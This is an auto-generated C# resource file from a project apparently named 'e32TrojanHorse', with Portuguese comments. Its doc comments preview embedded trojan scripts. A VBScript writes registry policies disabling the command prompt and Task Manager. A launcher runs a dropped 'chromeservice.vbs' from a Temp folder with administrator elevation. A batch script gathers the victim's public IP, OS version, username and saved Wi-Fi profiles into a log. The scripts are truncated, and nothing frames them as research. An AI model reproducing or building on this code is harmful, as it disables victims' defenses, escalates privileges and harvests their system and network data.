//------------------------------------------------------------------------------
// <auto-generated>
//     O código foi gerado por uma ferramenta.
//     Versão de Tempo de Execução:4.0.30319.42000
//
//     As alterações ao arquivo poderão causar comportamento incorreto e serão perdidas se
//     o código for gerado novamente.
// </auto-generated>
//------------------------------------------------------------------------------

namespace e32TrojanHorse.Properties {
    using System;
    
    
    /// <summary>
    ///   Uma classe de recurso de tipo de alta segurança, para pesquisar cadeias de caracteres localizadas etc.
    /// </summary>
    // Essa classe foi gerada automaticamente pela classe StronglyTypedResourceBuilder
    // através de uma ferramenta como ResGen ou Visual Studio.
    // Para adicionar ou remover um associado, edite o arquivo .ResX e execute ResGen novamente
    // com a opção /str, ou recrie o projeto do VS.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Retorna a instância de ResourceManager armazenada em cache usada por essa classe.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("e32TrojanHorse.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Substitui a propriedade CurrentUICulture do thread atual para todas as
        ///   pesquisas de recursos que usam essa classe de recurso de tipo de alta segurança.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Consulta uma cadeia de caracteres localizada semelhante a set x = createobject(&quot;Wscript.shell&quot;)
        ///set c = createobject(&quot;Scripting.FilesystemObject&quot;)
        ///set objShell = createobject(&quot;Shell.Application&quot;)
        ///on error resume next
        ///
        ///&apos;####################################################################
        ///
        ///msgBox &quot;Now we&apos;ll finish that :)&quot;, , &quot;e32&quot;
        ///x.RegWrite&quot;HKCU\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD&quot;,&quot;2&quot;,&quot;REG_DWORD&quot;
        ///x.RegWrite&quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr&quot;,&quot;1&quot;,&quot;REG_DWORD&quot;
        ///x.RegWrite&quot;HKCU\SOFTWARE\Microsoft\ [o restante da cadeia de caracteres foi truncado]&quot;;.
        /// </summary>
        internal static string chromeservice {
            get {
                return ResourceManager.GetString("chromeservice", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Consulta uma cadeia de caracteres localizada semelhante a set objShell = createobject(&quot;Shell.Application&quot;)
        ///dim trojanVariant
        /// trojanVariant=&quot;C:\Users\%username%\AppData\Local\Temp\01e32u82610.182190b127\chromeservice.vbs&quot; 
        /// ObjShell.ShellExecute &quot;wscript.exe&quot;, &quot;&quot;&quot;&quot; &amp; trojanVariant &amp; &quot;&quot;&quot; RunAsAdministrator&quot;, , &quot;runas&quot;, 1  .
        /// </summary>
        internal static string ilovemymomma {
            get {
                return ResourceManager.GetString("ilovemymomma", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Consulta um recurso localizado do tipo System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap leuraklmao {
            get {
                object obj = ResourceManager.GetObject("leuraklmao", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Consulta uma cadeia de caracteres localizada semelhante a @echo off
        ///title %random% %date% %username% %time% %random%
        ///color 0a
        ///ren -=- Writes INFO to a .LOG file in Current Directory -=-
        ///:info
        ///cls &amp; color 0a
        ///cd Desktop
        ///nslookup myip.opendns.com resolver1.opendns.com&gt;9K21JM10B.log
        ///ver&gt;&gt;9K21JM10B.log
        ///ECHO.&gt;&gt;9K21JM10B.log
        ///ECHO Username:%username%&gt;&gt;9K21JM10B.log
        ///ECHO.&gt;&gt;9K21JM10B.log
        ///ECHO Time: %time%&gt;&gt;9K21JM10B.log
        ///ECHO.&gt;&gt;9K21JM10B.log
        ///ECHO Date: %date%&gt;&gt;9K21JM10B.log
        ///ECHO.&gt;&gt;9K21JM10B.log
        ///netsh wlan show profiles&gt;&gt;9K21JM10B.log
        ///ECHO.&gt;&gt;9K21JM10B.log
        ///ip [o restante da cadeia de caracteres foi truncado]&quot;;.
        /// </summary>
        internal static string mstechfucker {
            get {
                return ResourceManager.GetString("mstechfucker", resourceCulture);
            }
        }
    }
}
